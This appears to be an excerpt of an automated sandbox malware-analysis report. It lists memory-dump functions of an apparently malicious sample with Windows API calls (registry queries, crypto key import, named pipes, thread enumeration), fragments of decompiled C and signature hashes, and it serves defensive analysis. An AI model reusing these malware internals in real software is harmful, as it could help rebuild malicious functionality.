                                                              • Part of subcall function 6E4B1D96: GetLastError.KERNEL32 ref: 6E4B1E4A
                                                            • GetLastError.KERNEL32 ref: 6E4B1BD3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                            • String ID:
                                                            • API String ID: 2673762927-0
                                                            • Opcode ID: ec30bde89d452ac6b97249d5f96c474bc11a103f47c9dfef906fc7d8ec30ec01
                                                            • Instruction ID: df4ed93986194aaa0972c2e2b7ae39cf0c1c30bbe87b2e60c6f4258911635c42
                                                            • Opcode Fuzzy Hash: ec30bde89d452ac6b97249d5f96c474bc11a103f47c9dfef906fc7d8ec30ec01
                                                            • Instruction Fuzzy Hash: 3911B936604615ABD711AAF5CCC4D9B77BCAF89314704496AEA0297705FBB0ED0A47F0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456748F, Relevance: 1.3, APIs: 1, Instructions: 63memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 045768B2: RegQueryValueExA.KERNELBASE(00000000,04575AB0,00000000,04575AB0,00000000,?,00000000,00000000,00000000,00000001,73B74D40,04575AB0,04575AB0,?,045674AD,?), ref: 045768EA
                                                              • Part of subcall function 045768B2: RtlAllocateHeap.NTDLL(00000000,?), ref: 045768FE
                                                              • Part of subcall function 045768B2: RegQueryValueExA.ADVAPI32(00000000,04575AB0,00000000,04575AB0,00000000,?,?,045674AD,?,04575AB0,00000000,00000001,00000000,73B74D40), ref: 04576918
                                                              • Part of subcall function 045768B2: RegCloseKey.ADVAPI32(00000000,?,045674AD,?,04575AB0,00000000,00000001,00000000,73B74D40,?,?,?,04575AB0,00000000), ref: 04576942
                                                            • HeapFree.KERNEL32(00000000,04575AB0,00000000,?,04575AB0,00000000,00000001,00000000,73B74D40,?,?,?,04575AB0,00000000), ref: 04567521
                                                              • Part of subcall function 045696CA: memcpy.NTDLL(04575AB0,04575AB0,00000000,04575AB0,04575AB0,04575AB0,?,?,?,045674D8,00000000,00000001,00000000,?,04575AB0,00000000), ref: 045696ED
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: HeapQueryValue$AllocateCloseFreememcpy
                                                            • String ID:
                                                            • API String ID: 1301464996-0
                                                            • Opcode ID: c5d736d58ba735654b5757c36228e8e4274ef1935dc915a27db2260d08877164
                                                            • Instruction ID: 6975b6e9a637180993c4f59a6b0779269a79fdd56105270866c000bad589b350
                                                            • Opcode Fuzzy Hash: c5d736d58ba735654b5757c36228e8e4274ef1935dc915a27db2260d08877164
                                                            • Instruction Fuzzy Hash: 5F119171600201EBDB25DA59E890EAD7BA9FB5C319F1004A9F603AB241EB74FD04FB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0458398C, Relevance: 1.3, APIs: 1, Instructions: 50memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 045768B2: RegQueryValueExA.KERNELBASE(00000000,04575AB0,00000000,04575AB0,00000000,?,00000000,00000000,00000000,00000001,73B74D40,04575AB0,04575AB0,?,045674AD,?), ref: 045768EA
                                                              • Part of subcall function 045768B2: RtlAllocateHeap.NTDLL(00000000,?), ref: 045768FE
                                                              • Part of subcall function 045768B2: RegQueryValueExA.ADVAPI32(00000000,04575AB0,00000000,04575AB0,00000000,?,?,045674AD,?,04575AB0,00000000,00000001,00000000,73B74D40), ref: 04576918
                                                              • Part of subcall function 045768B2: RegCloseKey.ADVAPI32(00000000,?,045674AD,?,04575AB0,00000000,00000001,00000000,73B74D40,?,?,?,04575AB0,00000000), ref: 04576942
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,1D4E36C0,?,00000000,?,?,?,00000000,045683C0,0456D17E,00000000,00000000), ref: 045839FD
                                                              • Part of subcall function 0456CB3E: StrChrA.SHLWAPI(1D4E36C0,0000002E,00000000,00000000,?,1D4E36C0,0457DBAB,00000000,00000000,00000000), ref: 0456CB50
                                                              • Part of subcall function 0456CB3E: StrChrA.SHLWAPI(00000004,00000020,?,1D4E36C0,0457DBAB,00000000,00000000,00000000), ref: 0456CB5F
                                                              • Part of subcall function 0457AE65: CloseHandle.KERNEL32(00000001,?,00000000,00000000,00000000,00000000,00000000,73BCF5B0,0456824E,?,00000001), ref: 0457AE8B
                                                              • Part of subcall function 0457AE65: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0457AE97
                                                              • Part of subcall function 0457AE65: GetModuleHandleA.KERNEL32(?,049B9732,?,00000000,00000000), ref: 0457AEB7
                                                              • Part of subcall function 0457AE65: GetProcAddress.KERNEL32(00000000), ref: 0457AEBE
                                                              • Part of subcall function 0457AE65: Thread32First.KERNEL32(00000001,0000001C), ref: 0457AECE
                                                              • Part of subcall function 0457AE65: CloseHandle.KERNEL32(00000001), ref: 0457AF16
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
                                                            • String ID:
                                                            • API String ID: 2627809124-0
                                                            • Opcode ID: 3f525b58f0828e7fd41f1e8db57691227eb74a01db05979c1a91965ecc585e5d
                                                            • Instruction ID: f6f1e28e6402ec8890213314fe1966fd90e900e79e702df19db20d50e94f79d8
                                                            • Opcode Fuzzy Hash: 3f525b58f0828e7fd41f1e8db57691227eb74a01db05979c1a91965ecc585e5d
                                                            • Instruction Fuzzy Hash: 11014F71610149FFAB11EBA9EC98C9FBBACFB456587101159F901B3100EE75BE04EB70
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457DB4F, Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 045768B2: RegQueryValueExA.KERNELBASE(00000000,04575AB0,00000000,04575AB0,00000000,?,00000000,00000000,00000000,00000001,73B74D40,04575AB0,04575AB0,?,045674AD,?), ref: 045768EA
                                                              • Part of subcall function 045768B2: RtlAllocateHeap.NTDLL(00000000,?), ref: 045768FE
                                                              • Part of subcall function 045768B2: RegQueryValueExA.ADVAPI32(00000000,04575AB0,00000000,04575AB0,00000000,?,?,045674AD,?,04575AB0,00000000,00000001,00000000,73B74D40), ref: 04576918
                                                              • Part of subcall function 045768B2: RegCloseKey.ADVAPI32(00000000,?,045674AD,?,04575AB0,00000000,00000001,00000000,73B74D40,?,?,?,04575AB0,00000000), ref: 04576942
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00000000,045683BB,0456D17E,00000000,00000000), ref: 0457DBC5
                                                              • Part of subcall function 0456CB3E: StrChrA.SHLWAPI(1D4E36C0,0000002E,00000000,00000000,?,1D4E36C0,0457DBAB,00000000,00000000,00000000), ref: 0456CB50
                                                              • Part of subcall function 0456CB3E: StrChrA.SHLWAPI(00000004,00000020,?,1D4E36C0,0457DBAB,00000000,00000000,00000000), ref: 0456CB5F
                                                              • Part of subcall function 0456A6F7: lstrlen.KERNEL32(045647C4,00000000,00000000,?,?,?,045647C4,00000035,00000000,-00000005,00000000), ref: 0456A727
                                                              • Part of subcall function 0456A6F7: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 0456A73D
                                                              • Part of subcall function 0456A6F7: memcpy.NTDLL(00000010,045647C4,00000000,?,?,045647C4,00000035,00000000), ref: 0456A773
                                                              • Part of subcall function 0456A6F7: memcpy.NTDLL(00000010,00000000,00000035,?,?,045647C4,00000035), ref: 0456A78E
                                                              • Part of subcall function 0456A6F7: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 0456A7AC
                                                              • Part of subcall function 0456A6F7: GetLastError.KERNEL32(?,?,045647C4,00000035), ref: 0456A7B6
                                                              • Part of subcall function 0456A6F7: HeapFree.KERNEL32(00000000,00000000,?,?,045647C4,00000035), ref: 0456A7D9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
                                                            • String ID:
                                                            • API String ID: 730886825-0
                                                            • Opcode ID: 15242a626e9c4a01bd97d6665404656c4d19c2338f06b27fc87d0d583f8f765e
                                                            • Instruction ID: 10e4389715d0c8166be5bdfa53e32ff27b529b6a24c6e607f82b89944e234f5b
                                                            • Opcode Fuzzy Hash: 15242a626e9c4a01bd97d6665404656c4d19c2338f06b27fc87d0d583f8f765e
                                                            • Instruction Fuzzy Hash: 62014C31510205FBEB11DB95EC45F9E7BBCFB45614F100059B605A7180EA74BE08EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD6A1E, Relevance: 1.3, APIs: 1, Instructions: 42memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00DD6A1E(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
				void* _t24;
				signed short _t25;
				signed int _t27;
				intOrPtr* _t28;
				signed short _t29;

				_t28 = __edi;
				if(_a4 == 0) {
					L2:
					_t29 = E00DD15D7(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t29 == 0) {
						_t27 = _a12 >> 1;
						if(_t27 == 0) {
							_t29 = 2;
							HeapFree( *0xdda290, 0, _a4);
						} else {
							_t24 = _a4;
							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
							 *_t28 = _t24;
						}
					}
					L6:
					return _t29;
				}
				_t25 = E00DD5D1D(_a4, _a8, _a12, __edi); // executed
				_t29 = _t25;
				if(_t29 == 0) {
					goto L6;
				}
				goto L2;
			}








                                                            0x00dd6a1e
                                                            0x00dd6a26
                                                            0x00dd6a3d
                                                            0x00dd6a58
                                                            0x00dd6a5c
                                                            0x00dd6a61
                                                            0x00dd6a63
                                                            0x00dd6a73
                                                            0x00dd6a7f
                                                            0x00dd6a65
                                                            0x00dd6a65
                                                            0x00dd6a68
                                                            0x00dd6a6d
                                                            0x00dd6a6d
                                                            0x00dd6a63
                                                            0x00dd6a85
                                                            0x00dd6a89
                                                            0x00dd6a89
                                                            0x00dd6a32
                                                            0x00dd6a37
                                                            0x00dd6a3b
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000

                                                            APIs
                                                              • Part of subcall function 00DD5D1D: SysFreeString.OLEAUT32(00000000), ref: 00DD5D83
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,73BCF710,?,00000000,?,00000000,?,00DD1501,?,004F0053,039C9318,00000000,?), ref: 00DD6A7F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Free$HeapString
                                                            • String ID:
                                                            • API String ID: 3806048269-0
                                                            • Opcode ID: fc34a216f59afe03d4cf41874d29a96d5720129771760fc1e469ec61b865eb8b
                                                            • Instruction ID: 4888dc45ae4cba6e2961167ea8a6665a6874567cca45784bcbb3d9b61f5e0666
                                                            • Opcode Fuzzy Hash: fc34a216f59afe03d4cf41874d29a96d5720129771760fc1e469ec61b865eb8b
                                                            • Instruction Fuzzy Hash: 1F01F636101659BBCB229F44DC05FEA7B65FB04790F08C02AFE45AA224D731D960DBE0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD488A, Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 75%
                                                            			E00DD488A(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E00DD3FAB( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E00DD77D7(_a8 + _a8);
					if(_t21 != 0) {
						E00DD4324(_a4, _t21, _t23);
					}
					E00DD77EC(_a4);
				}
				return _t21;
			}





                                                            0x00dd4892
                                                            0x00dd4899
                                                            0x00dd489b
                                                            0x00dd48aa
                                                            0x00dd48b1
                                                            0x00dd48c0
                                                            0x00dd48c4
                                                            0x00dd48cb
                                                            0x00dd48cb
                                                            0x00dd48d3
                                                            0x00dd48d8
                                                            0x00dd48dd

                                                            APIs
                                                            • lstrlen.KERNEL32(00000000,00000000,00DD72E3,00000000,?,00DD63E1,00000000,00DD72E3,?,00000000,00DD72E3,00000000,039C9630), ref: 00DD489B
                                                              • Part of subcall function 00DD3FAB: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00DD48AF,00000001,00DD72E3,00000000), ref: 00DD3FE3
                                                              • Part of subcall function 00DD3FAB: memcpy.NTDLL(00DD48AF,00DD72E3,00000010,?,?,?,00DD48AF,00000001,00DD72E3,00000000,?,00DD63E1,00000000,00DD72E3,?,00000000), ref: 00DD3FFC
                                                              • Part of subcall function 00DD3FAB: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 00DD4025
                                                              • Part of subcall function 00DD3FAB: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00DD403D
                                                              • Part of subcall function 00DD3FAB: memcpy.NTDLL(00000000,00000000,039C9630,00000010), ref: 00DD408F
                                                              • Part of subcall function 00DD77D7: RtlAllocateHeap.NTDLL(00000000,00000000,00DD1275), ref: 00DD77E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                                                            • String ID:
                                                            • API String ID: 894908221-0
                                                            • Opcode ID: 566c03a11213240106f8624beda3f660faf490932b661c9623f5a0358a7ad946
                                                            • Instruction ID: c9053436e48c893da89a984193efa5bd9870ce63f5ea22c5bab8e01d578c46ae
                                                            • Opcode Fuzzy Hash: 566c03a11213240106f8624beda3f660faf490932b661c9623f5a0358a7ad946
                                                            • Instruction Fuzzy Hash: 56F03A36100108BBCB116F95DC40DEB3BADEF853A4B048023F909CA210DB31DA559BB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD2A5C, Relevance: 1.3, APIs: 1, Instructions: 26stringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00DD2A5C(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E00DD31ED(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E00DD5A8D(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}




                                                            0x00dd2a64
                                                            0x00dd2a7e
                                                            0x00000000
                                                            0x00dd2a9a
                                                            0x00dd2a75
                                                            0x00dd2a7c
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd2aa1

                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,00DD5CC3,3D00DD90,80000002,00DD17B3,00DD462D,74666F53,4D4C4B48,00DD462D,?,3D00DD90,80000002,00DD17B3,?), ref: 00DD2A81
                                                              • Part of subcall function 00DD5A8D: SysAllocString.OLEAUT32(00DD462D), ref: 00DD5AA7
                                                              • Part of subcall function 00DD5A8D: SysFreeString.OLEAUT32(00000000), ref: 00DD5AE7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: String$AllocFreelstrlen
                                                            • String ID:
                                                            • API String ID: 3808004451-0
                                                            • Opcode ID: 0b5192e295f1c7c3c5edd455fb4ccf9ea4ce4a33d3af913ddc9e73feb42a5576
                                                            • Instruction ID: 72af8c1ad06f747a07f34b16297dd0d351c0e2db98dcb0a626c44663053ac0ae
                                                            • Opcode Fuzzy Hash: 0b5192e295f1c7c3c5edd455fb4ccf9ea4ce4a33d3af913ddc9e73feb42a5576
                                                            • Instruction Fuzzy Hash: 9CF0923200020EBFDF129F90ED06EAA3F6AEB18394F048016FA1454171D733D9B1EBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD3AFD, Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00DD3AFD(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E00DD642D(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E00DD77EC(_a4);
				}
				return _t12;
			}





                                                            0x00dd3b09
                                                            0x00dd3b0e
                                                            0x00dd3b12
                                                            0x00dd3b19
                                                            0x00dd3b24
                                                            0x00dd3b28
                                                            0x00dd3b28
                                                            0x00dd3b31

                                                            APIs
                                                              • Part of subcall function 00DD642D: memcpy.NTDLL(00000000,00000110,00DD6E08,00DD6E08,?,?,00DD6E08,?,?,00DD308E,?), ref: 00DD6463
                                                              • Part of subcall function 00DD642D: memset.NTDLL ref: 00DD64D9
                                                              • Part of subcall function 00DD642D: memset.NTDLL ref: 00DD64ED
                                                            • memcpy.NTDLL(00DD6E08,00DD6E08,00000000,00DD6E08,00DD6E08,00DD6E08,?,?,00DD308E,?,?,00DD6E08,?), ref: 00DD3B19
                                                              • Part of subcall function 00DD77EC: RtlFreeHeap.NTDLL(00000000,00000000,00DD1333,00000000,00000000,?,00000000,?,?,?,?,?,00DD66B0,00000000,?,00000001), ref: 00DD77F8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: memcpymemset$FreeHeap
                                                            • String ID:
                                                            • API String ID: 3053036209-0
                                                            • Opcode ID: c990e5be19a3788a9782e72d6896d24fb24d3bbf1cdae018effcba34c0a97c3f
                                                            • Instruction ID: 07810fb1891aff528c013733c1c5ecf2044f0a9a94e59af72a0f90c882cc6ed2
                                                            • Opcode Fuzzy Hash: c990e5be19a3788a9782e72d6896d24fb24d3bbf1cdae018effcba34c0a97c3f
                                                            • Instruction Fuzzy Hash: 5CE0EC7B50652976CB122A95EC01DEB7F5CDF557A1F044026FE089A301E621DA5097F2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457AB41, Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.NTDLL ref: 0457AB4B
                                                              • Part of subcall function 0457AB7B: RegOpenKeyExA.KERNELBASE(0457AB63,00000000,00000000,00020119,80000001,00000000,?,00000000,?,00000000,?,0457AB63,80000001,?,045722F6), ref: 0457ABC2
                                                              • Part of subcall function 0457AB7B: RegOpenKeyExA.ADVAPI32(0457AB63,0457AB63,00000000,00020019,80000001,?,0457AB63,80000001,?,045722F6), ref: 0457ABD8
                                                              • Part of subcall function 0457AB7B: RegCloseKey.ADVAPI32(80000001,80000001,?,045722F6,04572306,?,0457AB63,80000001,?,045722F6), ref: 0457AC21
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Open$Closememset
                                                            • String ID:
                                                            • API String ID: 1685373161-0
                                                            • Opcode ID: 46a99e365879f98ae64d2ed241524f99d48c88efaf328cef4fa05b518c3bdc40
                                                            • Instruction ID: 6958c64099c839e2e79db145e0f92dcc5ba66753f0887fad4307b51614bdd9bf
                                                            • Opcode Fuzzy Hash: 46a99e365879f98ae64d2ed241524f99d48c88efaf328cef4fa05b518c3bdc40
                                                            • Instruction Fuzzy Hash: 80E0EC30240109BBEB01AE54E841F9D7756BB54758F108026BE0D5A251DAB1BA60EA91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456166D, Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,045885A0,0000002C,04569E85,049B8E6E,?,00000000,0457765C,?,00000318), ref: 04561687
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: FreeVirtual
                                                            • String ID:
                                                            • API String ID: 1263568516-0
                                                            • Opcode ID: 5e0ad03da19f3bbee70feb63f7d688078e45a922c460181adb44ba2567e2ac3d
                                                            • Instruction ID: b2a22721af0a5482f1aa6aa30bb1b7b02930c6d14b3cb6dc7596b7bd6229975b
                                                            • Opcode Fuzzy Hash: 5e0ad03da19f3bbee70feb63f7d688078e45a922c460181adb44ba2567e2ac3d
                                                            • Instruction Fuzzy Hash: 11D01734D00629EBCB609FA5D8869AEFB70BF08710F608228E46173190CB302D15DFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 04572C07, Relevance: 51.6, APIs: 34, Instructions: 636synchronizationtimethreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0457878B: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 045787BF
                                                              • Part of subcall function 0457878B: GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 04578880
                                                              • Part of subcall function 0457878B: ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 04578889
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?), ref: 04572CA5
                                                              • Part of subcall function 0456CDCB: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0456CDE5
                                                              • Part of subcall function 0456CDCB: CreateWaitableTimerA.KERNEL32(0458C1A8,00000001,?), ref: 0456CE02
                                                              • Part of subcall function 0456CDCB: GetLastError.KERNEL32(?,00000000,04567AF7,00000000,00000000,00008008), ref: 0456CE13
                                                              • Part of subcall function 0456CDCB: GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,04567AF7,00000000,00000000,00008008), ref: 0456CE53
                                                              • Part of subcall function 0456CDCB: SetWaitableTimer.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000000,04567AF7,00000000,00000000,00008008), ref: 0456CE72
                                                              • Part of subcall function 0456CDCB: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,04567AF7,00000000,00000000,00008008), ref: 0456CE88
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?), ref: 04572D08
                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 04572D85
                                                            • WaitForMultipleObjects.KERNEL32(00008005,?,00000000,000000FF), ref: 04572E2A
                                                              • Part of subcall function 04583C78: RtlAllocateHeap.NTDLL(00000000,00000010,73BCF730), ref: 04583C9A
                                                              • Part of subcall function 04583C78: HeapFree.KERNEL32(00000000,00000000,00000038,00000000,00000000,?,?,?,?,04572CDE,?), ref: 04583CC8
                                                            • WaitForSingleObject.KERNEL32(?,00000000,?), ref: 04572E5F
                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 04572E6E
                                                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04572E9B
                                                            • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 04572EB5
                                                            • _allmul.NTDLL(00000258,00000000,FF676980,000000FF), ref: 04572EFD
                                                            • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000258,00000000,FF676980,000000FF,00000000), ref: 04572F17
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04572F2D
                                                            • ReleaseMutex.KERNEL32(?), ref: 04572F4A
                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 04572F5B
                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 04572F6A
                                                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04572F9E
                                                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 04572FB8
                                                            • SwitchToThread.KERNEL32 ref: 04572FBA
                                                            • ReleaseMutex.KERNEL32(?), ref: 04572FC4
                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 04573002
                                                              • Part of subcall function 0457DC0F: RegOpenKeyA.ADVAPI32(80000001,?,73BCF710), ref: 0457DC2D
                                                              • Part of subcall function 0457DC0F: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0457DC5B
                                                              • Part of subcall function 0457DC0F: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0457DC6D
                                                              • Part of subcall function 0457DC0F: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0457DC92
                                                              • Part of subcall function 0457DC0F: HeapFree.KERNEL32(00000000,00000000), ref: 0457DCAD
                                                              • Part of subcall function 0457DC0F: RegCloseKey.ADVAPI32(?), ref: 0457DCB7
                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 0457300D
                                                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04573030
                                                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 0457304A
                                                            • SwitchToThread.KERNEL32 ref: 0457304C
                                                            • ReleaseMutex.KERNEL32(?), ref: 04573056
                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 0457306B
                                                            • CloseHandle.KERNEL32(?), ref: 045730B9
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 045730CD
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 045730D9
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 045730E5
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 045730F1
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 045730FD
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 04573109
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 04573115
                                                            • RtlExitUserThread.NTDLL(00000000,?,?,?,?,?,?,?), ref: 04573124
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Wait$Close$Handle$ObjectSingleTimerWaitable$HeapMultipleObjects$MutexRelease_allmul$FreeThread$AllocateCreateErrorLastOpenQuerySwitchTimeValue$EventExitFileSystemUser
                                                            • String ID:
                                                            • API String ID: 3804754466-0
                                                            • Opcode ID: 6544067f8701f6b89d3839cc51b2bfd68e1fba4a7ad5a7afac7f59bd12a755cf
                                                            • Instruction ID: 8034fb6a478ab31f86b664da427859b7fa05ddf839c3ecf1229f543851994f56
                                                            • Opcode Fuzzy Hash: 6544067f8701f6b89d3839cc51b2bfd68e1fba4a7ad5a7afac7f59bd12a755cf
